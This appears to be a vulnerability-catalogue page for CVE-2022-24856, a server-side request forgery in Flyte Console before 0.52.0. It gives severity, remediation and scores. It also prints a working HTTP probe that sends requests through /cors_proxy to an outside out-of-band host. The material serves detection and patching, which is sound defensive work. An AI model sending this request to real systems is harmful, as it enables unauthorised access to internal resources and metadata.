🔙 목록으로 돌아가기

CVE-2022-24856: Flyte Console <0.52.0 - Server-Side Request Forgery

TitleFlyte Console <0.52.0 - Server-Side Request Forgery
Authorpdteam
SeverityHigh
ImpactAn attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.
RemediationThe patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
CVSS Score7.5
EPSS Score0.81885
CVE IDCVE-2022-24856
CWE IDCWE-918
Tags cve2022 cve flyteconsole ssrf oss hackerone flyte vuln

🔍 Vulnerability Description

FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.

🌐 HTTP Request

GET /cors_proxy/https://oast.me/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24856.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-24856.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A